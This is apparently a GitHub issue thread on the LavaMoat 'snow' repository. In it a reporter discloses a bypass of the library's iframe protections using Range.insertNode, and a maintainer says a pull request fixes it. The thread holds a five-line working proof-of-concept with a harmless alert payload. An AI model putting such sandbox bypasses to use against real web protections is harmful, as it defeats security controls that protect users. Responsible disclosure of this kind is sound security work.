search

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License
102 stars 9 forks source link

Bypass with Range.insertNode #86

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

Nothing too clever, just yet another node insertion method that isn't hooked :)

var range = document.createRange();
var f = document.createElement("iframe");
range.selectNode(document.getElementsByTagName("head")[0]);
range.insertNode(f);
f.contentWindow.alert.call(top, 1);
weizman commented 1 year ago

Thanks, #103 should fix this.

Are there any other ways to use Range to inject a dom node? I didn't find any @mmndaniel

mmndaniel commented 1 year ago

Not that I'm aware of, but the DOM is wild so who knows :)